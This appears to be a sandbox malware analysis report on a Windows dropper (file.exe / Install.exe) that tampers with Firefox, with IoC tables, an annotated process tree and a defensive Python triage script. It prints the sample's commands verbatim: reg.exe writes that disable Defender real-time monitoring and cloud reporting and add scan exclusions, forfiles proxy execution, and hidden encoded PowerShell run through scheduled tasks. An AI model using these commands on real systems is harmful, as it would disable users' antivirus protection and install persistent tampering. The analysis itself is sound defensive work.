Analysis
max time kernel: 153s
max time network: 158s
platform: windows7_x64
resource: win7-20220812-en
resource tags: arch:x64, arch:x86, image:win7-20220812-en, locale:en-us, os:windows7-x64, system
submitted: 31/10/2022, 22:05
Static task: static1
Behavioral task: behavioral1
Sample: file.exe
Resource: win7-20220812-en
General
Target: file.exe
Size: 7.3MB
MD5: 0a29a0dc7519c70f9496cc9edc42f396
SHA1: d275c7f48a3a9c7e8504280b1e0487bb7c3b5747
SHA256: 77d090bfb26e7f9082108a82e3248706f9f2b5a86f96dc0a628495461211555e
SHA512: c7792ab61c37d4e49282ddb2901435cf760c3c91399ef53050323a2500ebd1c6e3c90dfcd138a68dcdefdca499379e72152a7f4331852a3d8d4547b2d25fd82e
SSDEEP: 196608:91OJSLWHeQmR7mACiY/jcOcOPosl6xfQvQ:3OJI7mACiG3v6xovQ
Malware Config
Signatures

Modifies Windows Defender Real-time Protection settings 4 IoCs
(signature header missing from the extracted page; name taken from the process-tree labels)
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" | reg.exe
The two identical pairs are the /reg:32 and /reg:64 invocations seen in the process tree: HKLM\SOFTWARE\Policies is not WOW64-redirected, so both views write the same key and no Wow6432Node entry appears.

Windows security bypass 36 IoCs
(signature header missing from the extracted page; name taken from the process-tree labels)
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe (9 occurrences)
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe (8 occurrences)
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | Process not Found
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\XYDCXZXPsTrrC = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\yOvDRBMJNKKU2 = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\YVKeAuHUOaLCRzVB = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\grMXAHIUMHIHAuvw = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\SvbbHukzU = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\dVbwgRbTSJJLORWiduR = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\grMXAHIUMHIHAuvw = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\grMXAHIUMHIHAuvw = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\SvbbHukzU = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\nolBHjueEzUn = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\YVKeAuHUOaLCRzVB = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\XYDCXZXPsTrrC = "0" | Process not Found
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\nolBHjueEzUn = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\dVbwgRbTSJJLORWiduR = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\yOvDRBMJNKKU2 = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\grMXAHIUMHIHAuvw = "0" | reg.exe
Each excluded path is written twice, once per registry view (the /reg:32 write lands under Wow6432Node because HKLM\SOFTWARE\Microsoft is redirected for 32-bit callers). A REG_DWORD value of 0 whose name is a path is how Defender stores a path exclusion, so every one of these directories is excluded from scanning; they are the drop locations used by Install.exe, QHhAKnF.exe and UbWVVsy.exe.
Executes dropped EXE 4 IoCs
pid | Process
544 | Install.exe
1252 | Install.exe
1648 | QHhAKnF.exe
800 | UbWVVsy.exe

Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Install.exe

Loads dropped DLL 8 IoCs
pid | Process
1424 | file.exe
544 | Install.exe (4 entries)
1252 | Install.exe (3 entries)
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
Drops file in System32 directory 9 IoCs
description | ioc | Process
File created | C:\Windows\system32\GroupPolicy\gpt.ini | Install.exe
File created | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | QHhAKnF.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.EXE (4 entries, one per powershell.EXE instance)
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat | UbWVVsy.exe
File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | QHhAKnF.exe
File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | QHhAKnF.exe
gpt.ini and Machine\Registry.pol are the local Group Policy store. Registry.pol holds the machine registry policy that the Group Policy engine applies under HKLM\SOFTWARE\Policies; writing it and then running gpupdate /force (the decoded payload of every scheduled task below) makes the Defender policy settings take effect and re-applies them on every refresh, independently of the direct reg.exe writes.

Drops file in Program Files directory 5 IoCs
description | ioc | Process
File created | C:\Program Files (x86)\SvbbHukzU\TThBQi.dll | UbWVVsy.exe
File created | C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi | UbWVVsy.exe
File opened for modification | C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi | UbWVVsy.exe
File created | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | UbWVVsy.exe
File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja | UbWVVsy.exe
browser\features is where Firefox keeps its bundled system add-ons and omni.ja is the packed archive of the browser's own resources; dropping an .xpi there and patching omni.ja (after backing it up) installs an extension without the user's consent and outside the normal add-on signing path.

Drops file in Windows directory 3 IoCs
description | ioc | Process
File created | C:\Windows\Tasks\bWLKrWFeqGsUKIPSIT.job | schtasks.exe
File created | C:\Windows\Tasks\biFxKMwOTZzXEKwTU.job | schtasks.exe
File created | C:\Windows\Tasks\HvGgydgoxkjNzSQ.job | schtasks.exe
.job files under C:\Windows\Tasks are the legacy task format, consistent with the /V1 switch on the SYSTEM-level schtasks /CREATE calls in the process tree. The task that creates HvGgydgoxkjNzSQ.job is not in the part of the tree that survived extraction.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). The sandbox's generic description for this signature calls it likely ransomware behaviour; nothing else in this report supports that (no file encryption or ransom note is recorded), and the dropped files point to a browser-tampering installer instead.
Creates scheduled task(s) 1 TTPs 7 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
2020 | schtasks.exe
1392 | schtasks.exe
1724 | schtasks.exe
276 | schtasks.exe
1348 | schtasks.exe
824 | schtasks.exe
1156 | schtasks.exe

Enumerates system info in registry 2 TTPs 2 IoCs
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | Install.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | Install.exe
Modifies data under HKEY_USERS 19 IoCs
description | ioc | Process
Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" | wscript.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | UbWVVsy.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix | UbWVVsy.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" | UbWVVsy.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host | wscript.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft | wscript.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings | UbWVVsy.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | UbWVVsy.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad | UbWVVsy.exe
Key created | \REGISTRY\USER\.DEFAULT\Software | wscript.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings | UbWVVsy.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | wscript.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings | wscript.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | wscript.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | wscript.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" | UbWVVsy.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" | UbWVVsy.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | UbWVVsy.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings | wscript.exe
All of these land under HKU\.DEFAULT, the profile hive used by the LocalSystem account, which is consistent with wscript.exe and UbWVVsy.exe running from the SYSTEM-level scheduled tasks rather than under the Admin user.
Suspicious behavior: EnumeratesProcesses 19 IoCs
pid | Process | entries
924 | powershell.EXE | 3
1616 | powershell.EXE | 3
1060 | powershell.EXE | 3
1504 | powershell.EXE | 3
800 | UbWVVsy.exe | 7

Suspicious use of AdjustPrivilegeToken 4 IoCs
description | pid | Process
Token: SeDebugPrivilege | 924 | powershell.EXE
Token: SeDebugPrivilege | 1616 | powershell.EXE
Token: SeDebugPrivilege | 1060 | powershell.EXE
Token: SeDebugPrivilege | 1504 | powershell.EXE

Suspicious use of WriteProcessMemory 64 IoCs
pid | Process | wrote to memory of pid | procid_target | entries
1424 | file.exe | 544 | 26 | 7
544 | Install.exe | 1252 | 27 | 7
1252 | Install.exe | 1608 | 29 | 7
1252 | Install.exe | 1644 | 31 | 7
1608 | forfiles.exe | 1616 | 33 | 7
1644 | forfiles.exe | 1296 | 34 | 7
1616 | cmd.exe | 824 | 36 | 7
1296 | cmd.exe | 1744 | 35 | 7
1616 | cmd.exe | 1676 | 38 | 7
1296 | cmd.exe | 1076 | 37 | 1 (the list ends at 64 entries)
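The registry IoCs above can be derived from the reg.exe command lines in the process tree below, and doing so is a useful consistency check when the signature list is truncated. The Python below is an added example, not part of the sandbox report or of the sample: it parses reg.exe ADD/DELETE command lines, predicts the \REGISTRY\MACHINE path the sandbox will log (inserting Wow6432Node for /reg:32 writes under HKLM\SOFTWARE, except for the non-redirected SOFTWARE\Policies subtree, which is why the DisableRealtimeMonitoring entries above have no Wow6432Node copy), and classifies what each write does to Defender. The sample command lines are copied from this report's process tree, plus one constructed benign HKCU write (the Contoso key is made up) for contrast.

```python
"""Triage reg.exe command lines for Windows Defender tampering.

Added example (not part of the sandbox report or the sample): parse the
reg.exe ADD/DELETE command lines a process tree shows, predict the
\\REGISTRY\\MACHINE path the sandbox's registry IoCs will record, and say
what each write does to Defender.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample: five command lines copied from this report's process
# tree, plus one benign HKCU write (the Contoso key is made up) for contrast.
SAMPLE_CMDLINES = [
    r'"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SvbbHukzU" /t REG_DWORD /d 0 /reg:32',
    r'REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64',
    r'REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32',
    r'REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64',
    r'REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32',
    r'REG ADD "HKCU\Software\Contoso\App" /v "Installed" /t REG_DWORD /d 1',
]

# Kernel-style hive names as the sandbox logs them. HKCU is the caller's SID
# under \REGISTRY\USER, which a command line alone does not reveal.
HIVES = {
    "HKLM": r"\REGISTRY\MACHINE", "HKEY_LOCAL_MACHINE": r"\REGISTRY\MACHINE",
    "HKU": r"\REGISTRY\USER", "HKEY_USERS": r"\REGISTRY\USER",
    "HKCU": r"\REGISTRY\USER\<sid>", "HKEY_CURRENT_USER": r"\REGISTRY\USER\<sid>",
}

# HKLM\SOFTWARE subtrees that WOW64 does not redirect, so a /reg:32 write and
# a /reg:64 write hit the same key. SOFTWARE\Policies is evidenced by this
# report itself (the DisableRealtimeMonitoring IoCs have no Wow6432Node copy);
# Microsoft's "Registry Keys Affected by WOW64" page lists the others.
SHARED_PREFIXES = ("software\\policies\\",)


@dataclass
class RegWrite:
    op: str
    key: str
    value: str
    data: Optional[str]
    view: str              # "32", "64" or "native" (no /reg switch)
    native_path: str       # the IoC string the sandbox is expected to log
    scope: str
    verdict: Optional[str]


def _tokens(cmdline: str) -> List[str]:
    # Windows-style split: a double-quoted run is one token, quotes stripped.
    return [q if q else u for q, u in re.findall(r'"([^"]*)"|(\S+)', cmdline)]


def _native_path(key: str, view: str) -> str:
    hive, _, rest = key.partition("\\")
    native = HIVES.get(hive.upper(), hive)
    low = rest.lower()
    if (view == "32" and native == r"\REGISTRY\MACHINE"
            and low.startswith("software\\")
            and not low.startswith("software\\wow6432node\\")
            and not low.startswith(SHARED_PREFIXES)):
        rest = "SOFTWARE\\Wow6432Node\\" + rest[len("SOFTWARE\\"):]
    return native + "\\" + rest


def classify(op: str, key: str, value: str, data: Optional[str]) -> Optional[str]:
    """What the write means for Defender, or None if it is not a Defender key."""
    k, v = key.lower(), value.lower()
    if "windows defender" not in k:
        return None
    if op == "ADD" and k.endswith("exclusions\\paths"):
        return "exclusion: path excluded from scanning: " + value
    if op == "ADD" and k.endswith("exclusions\\extensions"):
        return "exclusion: extension excluded from scanning: ." + value
    if op == "ADD" and k.endswith("exclusions\\processes"):
        return "exclusion: process excluded from scanning: " + value
    if k.endswith("real-time protection") and v == "disablerealtimemonitoring":
        if op == "ADD" and data == "1":
            return "real-time protection disabled"
        if op == "DELETE":
            return "DisableRealtimeMonitoring removed (real-time protection reverts to default)"
    if k.endswith("spynet") and v in ("spynetreporting", "submitsamplesconsent") and data == "0":
        return "cloud (MAPS) reporting or sample submission disabled"
    return "other write under a Windows Defender key"


def parse_reg_cmdline(cmdline: str) -> Optional[RegWrite]:
    toks = _tokens(cmdline)
    # toks[0] is "REG", "reg.exe" or a full path to reg.exe
    if len(toks) < 3 or not toks[0].lower().endswith(("reg", "reg.exe")):
        return None
    op, key = toks[1].upper(), toks[2]
    if op not in ("ADD", "DELETE"):
        return None
    value, data, view = "", None, "native"
    it = iter(toks[3:])
    for t in it:
        tl = t.lower()
        if tl == "/v":
            value = next(it, "")
        elif tl == "/d":
            data = next(it, None)
        elif tl == "/t":
            next(it, None)             # type is not needed for triage
        elif tl.startswith("/reg:"):
            view = tl[5:]
    path = _native_path(key, view)
    if value:
        path += "\\" + value
    if op == "ADD" and data is not None:
        path += f' = "{data}"'         # the sandbox's "Set value" notation
    rest = key.partition("\\")[2].lower()
    scope = "policy (Group Policy key)" if rest.startswith("software\\policies\\") else "local preference"
    return RegWrite(op, key, value, data, view, path, scope, classify(op, key, value, data))


def triage(cmdlines) -> List[RegWrite]:
    return [w for w in map(parse_reg_cmdline, cmdlines) if w is not None]


if __name__ == "__main__":
    for w in triage(SAMPLE_CMDLINES):
        print(f"{w.op:6} view={w.view:>6} {w.scope:26} {w.verdict}")
        print(f"       -> {w.native_path}")
```

Policy-scope writes (HKLM\SOFTWARE\Policies\...) override the local preferences and survive a user re-enabling protection in the UI, which is why this sample writes each exclusion to both keys; the DELETE case shows the sample removing its own DisableRealtimeMonitoring policy once the exclusions are in place.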
Processes

Note on image paths: the sandbox records the image a 32-bit parent launched under C:\Windows\SysWOW64 even when the command line names C:\Windows\System32, because WOW64 file-system redirection maps a 32-bit caller's System32 to SysWOW64. The forfiles.exe invocations below are a proxy-execution trick: forfiles /p c:\windows\system32 /m cmd.exe /c "..." runs the quoted command once for the matching file, so cmd.exe is started by forfiles rather than directly by Install.exe.

C:\Users\Admin\AppData\Local\Temp\file.exe  (PID 1424)
  cmd: "C:\Users\Admin\AppData\Local\Temp\file.exe"
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
    C:\Users\Admin\AppData\Local\Temp\7zS6115.tmp\Install.exe  (PID 544)
      cmd: .\Install.exe
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious use of WriteProcessMemory
        C:\Users\Admin\AppData\Local\Temp\7zS734D.tmp\Install.exe  (PID 1252)
          cmd: .\Install.exe /S /site_id "525403"
          - Executes dropped EXE
          - Checks BIOS information in registry
          - Loads dropped DLL
          - Drops file in System32 directory
          - Enumerates system info in registry
          - Suspicious use of WriteProcessMemory
            C:\Windows\SysWOW64\forfiles.exe  (PID 1608)
              cmd: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
              - Suspicious use of WriteProcessMemory
                C:\Windows\SysWOW64\cmd.exe  (PID 1616)
                  cmd: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                  - Suspicious use of WriteProcessMemory
                    \??\c:\windows\SysWOW64\reg.exe  (PID 824)
                      cmd: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                    \??\c:\windows\SysWOW64\reg.exe  (PID 1676)
                      cmd: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
            C:\Windows\SysWOW64\forfiles.exe  (PID 1644)
              cmd: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
              - Suspicious use of WriteProcessMemory
                C:\Windows\SysWOW64\cmd.exe  (PID 1296)
                  cmd: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                  - Suspicious use of WriteProcessMemory
                    \??\c:\windows\SysWOW64\reg.exe  (PID 1744)
                      cmd: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                    \??\c:\windows\SysWOW64\reg.exe  (PID 1076)
                      cmd: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
            C:\Windows\SysWOW64\schtasks.exe  (PID 276)
              cmd: schtasks /CREATE /TN "gGPOIrlNR" /SC once /ST 18:54:58 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
              (the -EncodedCommand argument is base64 of UTF-16LE text and decodes to: start-process -WindowStyle Hidden gpupdate.exe /force)
              - Creates scheduled task(s)
            C:\Windows\SysWOW64\schtasks.exe  (PID 1128)
              cmd: schtasks /run /I /tn "gGPOIrlNR"
            C:\Windows\SysWOW64\schtasks.exe  (PID 2008)
              cmd: schtasks /DELETE /F /TN "gGPOIrlNR"
            C:\Windows\SysWOW64\schtasks.exe  (PID 1348)
              cmd: schtasks /CREATE /TN "bWLKrWFeqGsUKIPSIT" /SC once /ST 23:07:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\IZVHwqqvKwOqTrb\QHhAKnF.exe\" KP /site_id 525403 /S" /V1 /F
              - Drops file in Windows directory
              - Creates scheduled task(s)
C:\Windows\system32\taskeng.exe  (PID 1192)
  cmd: taskeng.exe {A5E5AC8B-FE41-4058-B00D-9DFC649AA1A7} S-1-5-21-999675638-2867687379-27515722-1000:ORXGKKZC\Admin:Interactive:[1]
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE  (PID 924)
      cmd: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
      (the encoded command is base64 of UTF-16LE text and decodes to: start-process -WindowStyle Hidden gpupdate.exe /force; the same blob is used by each of the four instances below)
      - Drops file in System32 directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
        C:\Windows\system32\gpupdate.exe  (PID 768)
          cmd: "C:\Windows\system32\gpupdate.exe" /force
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE  (PID 1616)
      cmd: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
      - Drops file in System32 directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
        C:\Windows\system32\gpupdate.exe  (PID 1396)
          cmd: "C:\Windows\system32\gpupdate.exe" /force
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE  (PID 1060)
      cmd: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
      - Drops file in System32 directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
        C:\Windows\system32\gpupdate.exe  (PID 1744)
          cmd: "C:\Windows\system32\gpupdate.exe" /force
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE  (PID 1504)
      cmd: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
      - Drops file in System32 directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
        C:\Windows\system32\gpupdate.exe  (PID 556)
          cmd: "C:\Windows\system32\gpupdate.exe" /force
C:\Windows\system32\gpscript.exe  (PID 912)
  cmd: gpscript.exe /RefreshSystemParam
C:\Windows\system32\taskeng.exetaskeng.exe {EC6CFC43-B352-44AF-B53B-1AF5DE83BD95} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:940
-
C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\IZVHwqqvKwOqTrb\QHhAKnF.exeC:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\IZVHwqqvKwOqTrb\QHhAKnF.exe KP /site_id 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:1648 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gspWoPfEo" /SC once /ST 21:48:23 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:824
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gspWoPfEo"3⤵PID:1076
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gspWoPfEo"3⤵PID:1748
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:1188
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:912
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:1628
-
